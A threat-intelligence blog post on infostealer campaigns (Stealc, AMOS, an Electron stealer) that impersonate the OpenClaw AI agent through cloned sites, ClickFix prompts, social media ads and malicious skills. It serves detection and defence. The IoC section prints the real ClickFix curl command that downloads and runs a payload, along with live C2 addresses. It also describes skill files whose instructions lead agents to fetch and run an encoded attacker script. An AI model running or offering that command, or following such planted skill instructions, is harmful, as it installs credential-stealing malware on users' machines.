OpenClaw: A viral AI assistant and a magnet for infostealer malware and ClickFix trickery

Introduction

Cybercriminals have quickly pounced on the viral popularity of the artificial intelligence (AI) agent platform OpenClaw, primarily to distribute information-stealing malware that can harvest credentials, tokens and browser data. While this initial cybercriminal activity leverages OpenClaw’s popularity and relies on well-known techniques to distribute malware, OpenClaw also presents potential emerging enterprise risks.

In the future, developers may adapt information stealers to harvest OpenClaw agent configuration data containing secrets and operational context that can reveal integrations, tools and access paths, potentially leading to software-as-a-service (SaaS) or cloud compromise. Additionally, the expanding third-party ecosystem around OpenClaw introduces risks from malicious third-party-developed agent skills and supply chain-style attacks, which can lead to user- or agent-initiated execution of attacker-controlled content. Researchers have already identified thousands of malicious OpenClaw skills on GitHub and the ClawHub skills repository. In the OpenClaw ecosystem, skills are directory-based extensions centered on a SKILL.md file that contains metadata and usage or setup instructions, which OpenClaw can load at runtime. Because agent runtimes can aggregate sensitive files, credentials, tokens and cloud integrations, a compromise can quickly escalate from a single endpoint to data theft, account takeover and lateral movement into enterprise or cloud environments.

This blog is a redacted version of a report based on the Intel 471 Malware Intelligence team’s investigation into early threat activity targeting the OpenClaw ecosystem — primarily a cluster of OpenClaw-themed malware delivery operations that exploit the project’s rapid adoption to distribute information-stealing malware through “brand-as-lure” social engineering. Across these activities, threat actors relied on cloned websites, typosquatted domains and deceptive onboarding mechanisms — such as fake download workflows and verification or CAPTCHA dialogs — to prompt user-initiated execution rather than exploiting OpenClaw software vulnerabilities. The blog documents supporting infrastructure and indicators of compromise (IoCs) to aid detection and response, and concludes fraudulent activity is likely to increase across the ecosystem through additional malicious skills, installer look-alikes and supply chain-style abuse of repositories and registries. The full report with artifact extraction events is available to Verity471 subscribers. Please contact sales@intel471.com to arrange access.

OpenClaw overview

Since early 2026, interest in OpenClaw — the open source autonomous AI agent developed by Peter Steinberger — has surged. First released in November 2025, the project went through several rapid rebrands, shifting from Clawdbot to Moltbot before adopting the OpenClaw name. Growth accelerated in late January 2026. As of March 5, 2026, the GitHub repository had reached about 265,000 stars and 50,600 forks, reflecting strong community engagement (see: Figure 1).

Figure 1: The image depicts the star history of the official OpenClaw GitHub repository at https://github.com/openclaw/openclaw as of March 5, 2026.

OpenClaw's rising profile also made it a prime target for threat actors. High search volume and constant community activity expand the reach of look-alike websites, repositories, fake installers and malicious tutorials, while the urgency to get up and running can push users to execute unvetted commands. These conditions increase the success rate of social engineering and malware delivery campaigns.

This report documents several instances of threat actors exploiting OpenClaw’s popularity, including two previously unreported campaigns distributing information-stealing malware. It also summarizes previously reported abuse cases and offers practical recommendations to help users adopt OpenClaw more safely.

Campaign 1: A ClickFix lure and infostealer payload

Initial discovery

On March 2, 2026, we discovered a fraudulent website imitating the official OpenClaw site at https://openclaw.ai/. The campaign employed a ClickFix social-engineering tactic designed to trick users into installing malware. ClickFix typically involves tricking a user into copying a command or script and entering it into the command line on a Windows or macOS machine, resulting in the download of malware. The site was hosted at https://app-clawbot[.]org, a domain registered Feb. 3, 2026. We determined the registration email, david-collins@quickblox.net, was also linked to other OpenClaw-themed domains, including https://ai-clawbot[.]org and https://ai-clawbot[.]org, both registered Feb. 2, 2026. Only https://app-clawbot[.]org remained active at the time of this report.

ClickFix lure

Users visiting https://app-clawbot[.]org encounter a site that closely mimics the legitimate OpenClaw website but differs in the “Quick Start” section (see: Figure 2). On the official site, the section features a one-line command for installing the OpenClaw tool. On the fraudulent site, however, the section includes a “Download OpenClaw” button (see: Figure 3).

Figure 2: The image depicts a screenshot of the official OpenClaw website at https://openclaw.ai/ March 2, 2026.

Figure 3: The image depicts a screenshot of the fraudulent OpenClaw website at https://app-clawbot[.]org March 2, 2026.

Clicking the button redirects users to a ClickFix page with instructions to “install” OpenClaw (see: Figure 4).

Figure 4: The image depicts a screenshot of the ClickFix “Install OpenClaw” prompt at https://app-clawbot[.]org March 2, 2026.

Users are instructed to open the command line and copy and paste the following installation command:

Running this command downloads and executes a sample of the Stealc_v2 information-stealing malware.

Stealc payload

Analysis of the payload identified a Stealc sample with the d9f0dd48745d5be7ef74ee9f2cb4640ab310a5a7d2f2f01654e15370ac5853eb SHA-256. Upon execution, the malware communicates with its command-and-control (C2) endpoint at http://146.103.127.46/5f86ff22ffb6444b.php to retrieve instructions and exfiltrate harvested data. The embedded configuration included the build identifier "guugle2," allowing operators to assess the success of this particular campaign on the back end.

• OpenClaw.exe SHA-256: d9f0dd48745d5be7ef74ee9f2cb4640ab310a5a7d2f2f01654e15370ac5853eb
• C2: http://146.103.127.46/5f86ff22ffb6444b.php
• Rivest Cipher 4 (RC4) key: 525d2e32efc241fe
• Build name: guugle2

Additional observations

Using URLScan at urlscan.io, we observed a scan from Feb. 4, 2026, for the domain https://app-clawbot[.]org (see: https://urlscan.io/result/019c27f2-5f87-76b8-bca4-1ab4ecc07d61/). Analysis showed threat actors behind this campaign initially included the referenced installation command in the “Quick Start” section, later replacing it with ClickFix (see: https://urlscan.io/result/019c46fc-f9de-7392-a55d-22d7c2207463/, Figure 5).

Figure 5: The image depicts the command users were prompted to run to download and execute a malicious payload masquerading as the OpenClaw executable from https://app-clawbot[.]org Feb. 4, 2026.

Campaign 2: AI agent lures lead to malware payloads

Initial discovery

On March 3, 2026, we observed an advertisement for the “Clearl AI” agent circulating on X aka Twitter, which had received more than 1 million views since Feb. 24, 2026 (see: Figure 6).

Figure 6: The image depicts two examples of X advertisements promoting the “Clearl AI” agent March 3, 2026.

Clicking the ad redirected to the https://clearl.co/ website where the AI agent was available for download. Further investigation revealed the “Clearl AI” X profile at https://x.com/clearl_ai was created in February 2026 and claimed to be based in the U.S. (see: Figure 7).

Figure 7: The image depicts a screenshot of the “Clearl AI” X profile at https://x.com/clearl_ai March 3, 2026.

Additional searches on X indicated multiple bots were used to further promote the tool (see: Figure 8).

Figure 8: The image depicts a screenshot of bots promoting the “Clearl AI” agent on X March 3, 2026.

Clearl AI website

When visiting https://clearl[.]co, users are first prompted to complete a Cloudflare verification before being directed to the site. The website closely resembles the legitimate OpenClaw site at openclaw.ai but omits several sections and features different titles and descriptions (see: Figure 9).

Figure 9: The image depicts a screenshot of the “Clearl AI” website at https://clearl.co March 3, 2026.

The site includes a “Quick Start” section offering downloads of the "assistant" for both Windows and macOS. Observations indicate macOS users can only download a .dmg file named “Clearl_AI.dmg,” while Windows users can download “Clearl_AI.exe” regardless of whether they select the macOS or Windows option. Users must also complete a CAPTCHA challenge before the file is downloaded to their system.

MacOS payload

Analysis of the “Clearl_AI.dmg” payload revealed the AMOS macOS information stealer with the following configurations:

• Clearl_AI.dmg SHA-256: 5efe3d6ff69002f2cf82683f2d866264d0836b9f02e8b52719ecbd6fecf72a62
• User: dayd
• Build ID: 3f008a15155a45fa9179188542bab14e
• Directory for stolen data: /tmp/xdivcmp/
• C2: http://172.94.9.250/log

Windows payload

On Windows systems, the downloaded file is an installer named “Clearl_Ai.exe.” Unlike the macOS case, this sample did not match any known malware family. Instead, analysis revealed the following infection chain.

When executed, the installer silently places files in the user’s roaming profile under a directory named “Clearc0Application” and launches its main executable — “App.exe.”

The installed program is an Electron-based desktop application built with JavaScript and running within the Chromium browser runtime. Upon launch, it displays a CAPTCHA dialog, which serves as a decoy while the malware operates in the background (see: Figure 10).

Figure 10: The image depicts a CAPTCHA dialog used as a decoy while malware operates in the background March 3, 2026.

The primary malicious component is a highly obfuscated JavaScript information stealer that profiles the system and collects data from the infected host. The malware initiates contact with its C2 server using the following endpoint:

The data in the message parameter is encoded with multiple layers, combining Base64 and reversed Base64 strings. Encoded information includes the host's hostname, Windows version, system architecture, installed memory, uptime and system language.

After data collection, the stolen information is compressed into a ZIP archive and exfiltrated over HTTP to the C2 endpoint:

The malware also includes anti-analysis checks to detect automated analysis environments and evade security sandboxes. During execution, for example, it compares the machine’s hostname against an embedded blacklist:

• DESKTOP-NAKFFMT
• DESKTOP-VRSQLAG
• DESKTOP-B0T93D6
• DESKTOP-WG3MYJS
• DESKTOP-7XC6GEZ
• DESKTOP-UWQ9VYI

Unattributed Windows malware details:

• Clearl_Ai.exe SHA-256: 8196b3c51e5b6519e101a5a3e8df77435ac19e9d58bfd9cbaac4b03492abc79a
• C2: http://188.137.246[.]189/laravel.php

Open source observations

Infostealer abuse of the OpenClaw ecosystem

On Feb. 20, 2026, Malwarebytes Labs reported a malicious campaign that used Facebook ads impersonating Microsoft to distribute counterfeit Windows 11 installers. The ads redirected users to convincing replicas of Microsoft's Software Download page hosted on look-alike domains such as ms-25h2-download.pro and ms-25h2-update.pro. Selected visitors were presented with a 75 MB installer (e.g., ms-update32.exe) hosted on GitHub, rather than a legitimate update package. When executed, the installer deployed an Electron-based application to "C:\Users\<USER>\AppData\Roaming\LunarApplication\" and launched obfuscated PowerShell scripts designed to steal browser credentials, session cookies and cryptocurrency wallet data. The campaign also employed geofencing, sandbox detection and parallel Facebook advertising infrastructure to evade detection and maintain delivery.

Given the similarities — particularly the use of paid social media advertisements and Electron-based desktop applications in the infection chain — we assess with medium confidence these campaigns may be related. These findings further indicate threat actors are increasingly leveraging social media advertising to spread information-stealing malware disguised as legitimate or widely recognized software, including applications such as OpenClaw and Windows installers.

The above campaigns are not isolated incidents of threat actors exploiting the rapid popularity of OpenClaw to distribute malware. On Feb. 23, 2026, Trend Micro reported OpenClaw was being exploited as a malware delivery platform through malicious skills uploaded to third-party repositories such as ClawHub. Researchers identified at least 39 skills that abused SKILL.md setup instructions to prompt users or agents to install a fake OpenClawCLI prerequisite from an external URL (e.g., openclawcli.vercel.app). OpenClaw would then retrieve the site’s installation instructions, which included a Base64-encoded command that decoded into a curl-fetched script on the attacker's infrastructure, which ultimately installed and executed the AMOS macOS information stealer. The attack flow also included a deceptive, human-in-the-loop password prompt designed to trick users into entering their credentials.

Trend Micro reported that as of Feb. 23, 2026, it had identified more than 2,200 malicious OpenClaw skills on GitHub. In the OpenClaw ecosystem, skills are directory-based extensions centered on a SKILL.md file that contains metadata and usage or setup instructions, which OpenClaw can load at runtime. Because skills are often installed from third-party sources and may include setup steps or supporting scripts, the attack surface expands as the ecosystem grows. ClawHub serves as OpenClaw's public skill registry for discovering and installing skills. ClawHub listed more than 15,424 skills available for download at the time of this report.

On Feb. 16, 2026, Hudson Rock reported another instance of OpenClaw exploitation — an information-stealer campaign that targeted OpenClaw configurations. Threat actors deployed the Vidar information stealer, which did not require an OpenClaw-specific module. Instead, the malware relied on a broad file-grabbing routine designed to search for sensitive file extensions and directory names, such as .openclaw. While likely seeking standard credentials or secrets, the malware captured the user’s AI assistant configuration, granting access to the assistant’s full operational context.

Given OpenClaw’s rapid rise in popularity and increasing adoption, more information stealer operators are likely to begin targeting OpenClaw-related artifacts. As a result, the development and deployment of specialized modules designed to locate, extract and weaponize OpenClaw configurations and related data is expected to increase.

Lastly, on March 4, 2026, Huntress documented a related OpenClaw abuse campaign involving malicious GitHub repositories that posed as OpenClaw installers and were available from Feb. 2-10, 2026. In this incident, the attacker did not rely solely on social media posts or niche forums but likely also malicious advertising (malvertising) since the fake repository reportedly appeared as a top suggested result in Bing’s AI search for “OpenClaw Windows” — increasing the likelihood that users would follow the installation steps. Victims who followed the repository’s instructions would install information-stealing malware and GhostSocks on Windows systems, and the AMOS macOS stealer on macOS devices. Huntress also identified the use of a novel Stealth packer to load and decrypt payloads in memory and establish persistence.

Assessment

The campaign illustrates a "brand-as-lure" abuse pattern, with threat actors exploiting OpenClaw’s rapid surge in popularity to create installation-themed lures for distributing information-stealing malware. Rather than exploiting software vulnerabilities, the operators prey on user demand, onboarding friction and ecosystem trust to deploy both commodity and novel stealers at scale. Delivery methods are multichannel, including malicious skills, typosquatted domains, counterfeit OpenClaw websites, social media ads and ClickFix-style instructions that prompt users to execute malicious commands.

The use of stealers such as Stealc and AMOS is particularly significant, as it enables attackers to gain follow-on access. Beyond the initial endpoint infection, the malware can harvest credentials, tokens, browser data and, when present, OpenClaw configuration files containing secrets and operational context. Exposed agent data can accelerate further intrusions by revealing integrations, tools and access paths, potentially leading to software-as-a-service (SaaS) or cloud compromise and lateral movement with minimal additional reconnaissance.

Looking ahead, malicious activity is likely to increase across the ecosystem through additional fraudulent skills, installer look-alikes and supply chain-style abuse of repositories and registries. Adversaries also are expected to shift between trust channels such as ads, search engine optimization (SEO), sponsored results and compromised repositories as defenses evolve, while adding OpenClaw-specific collection logic to information stealers to more effectively identify and monetize agent-related secrets.

Recommendations

IMPORTANT: OpenClaw should not be installed on standard corporate laptops or employee workstations at this time. If used, deployment should be limited to controlled testing in security-managed, isolated environments, such as dedicated virtual machines (VMs) or laboratory systems, with strict access controls. As a novel and rapidly evolving agent framework, OpenClaw is more likely to exhibit immature security defaults, newly discovered vulnerabilities and increased operational exposure as adoption grows. Its expanding third-party ecosystem also introduces risks from malicious skills and supply chain-style attacks, which can lead to user- or agent-initiated execution of attacker-controlled content. Because agent runtimes can aggregate sensitive files, credentials, tokens and cloud integrations, a compromise can quickly escalate from a single endpoint to data theft, account takeover and lateral movement into enterprise or cloud environments.

Prevention strategies (for organizations evaluating OpenClaw)

Note: The following prevention strategies are based on Microsoft’s advisory for running OpenClaw safely, available at https://www.microsoft.com/en-us/security/blog/2026/02/19/running-openclaw-safely-identity-isolation-runtime-risk/:

• Run OpenClaw in isolation: Deploy on a dedicated VM or a separate physical device not used for daily work. Treat the environment as disposable and plan to rebuild frequently.
• Use dedicated, low-privilege identities and non-sensitive data: Create agent-only accounts and tokens, minimize permissions, prefer short-lived tokens and enforce controlled consent for powerful OAuth scopes. Rotate credentials routinely and assume compromise is possible.
• Constrain the skills supply chain: Treat skill installation as explicit approval equivalent to executing third-party code. Restrict install sources/publishers and review updates before deployment.
• Monitor for state and memory manipulation: Regularly review saved instructions and system state for unexpected persistent rules, newly trusted sources or behavioral drift. Maintain snapshots to compare known-good states to the current state.
• Restrict network egress for agent hosts: Allow outbound connections only to destinations required for business. Block high-risk ingestion sources and apply stricter web filtering policies to OpenClaw device groups.
• Harden users against brand-as-lure attacks: Train users to treat verification or installation commands from websites as suspicious — especially prompts to paste terminal commands or download assistants (e.g., ClickFix prompts).
• Implement typosquat recognition and blocking: Use domain name system (DNS) and web controls to block newly registered or look-alike domains and alert when users attempt to reach OpenClaw-themed domains not on an allowlist, such as openclaw paired with “app,” “ai,” “bot” or “agent.”

Detection strategies

• Alert on browser-to-shell execution chains: Monitor for “msedge.exe” or “chrome.exe” spawning “cmd.exe” or “powershell.exe,” followed by “curl.exe” and execution from %APPDATA% or %TEMP%, as seen in ClickFix-style delivery methods.
• Hunt for suspicious Windows curl usage: Flag instances where “curl.exe” downloads executable (.exe) files into %APPDATA% with immediate execution using “start” or “cmd /c.”
• Watch for Electron app staging in roaming profiles: Alert on creation of new directories under %APPDATA%\Roaming\, such as “Clearc0Application,” followed by execution of “App.exe.”
• Enable network-based detection: Alert on outbound HTTP traffic to IP-based C2 servers and newly registered look-alike domains. Prioritize connections that occur immediately after the execution of newly downloaded installers.

Indicator of compromise-driven blocking, hunting

• Domains (block/monitor)
  • app-clawbot.org, ai-clawbot.org, ai-openclaw.org, clearl.co
• IP addresses/C2s (block/alert)
  • 146.103.127.46 (Stealc C2), 172.94.9.250 (AMOS macOS stealer C2), 188.137.246.189 (Windows information stealer C2)
• URLs/paths (Endpoint detection and response (EDR) web telemetry hunts)
  • https://app-clawbot.org/source/OpenClaw.exe
  • http://146.103.127.46/5f86ff22ffb6444b.php (StealC C2 path)
  • http://172.94.9.250/log (AMOS C2 path)
  • http://188.137.246.189/laravel.php?api=api&hash=<encoded_data>&message=<encoded_data> (Windows C2 endpoints)
• File hashes (block/hunt):
  • Stealc_v2: d9f0dd48745d5be7ef74ee9f2cb4640ab310a5a7d2f2f01654e15370ac5853eb
  • AMOS: 5efe3d6ff69002f2cf82683f2d866264d0836b9f02e8b52719ecbd6fecf72a62
  • Clearl Windows installer: 8196b3c51e5b6519e101a5a3e8df77435ac19e9d58bfd9cbaac4b03492abc79a
• Command-line (EDR detections):
  • curl.exe -k -Ss "https://app-clawbot.org/source/OpenClaw.exe" -o "%Appdata%\OpenClaw.exe" && start "" "%Appdata%\OpenClaw.exe"
• Host-based artifacts (hunt):
  • %APPDATA%\OpenClaw.exe
  • %APPDATA%\Roaming\Clearc0Application\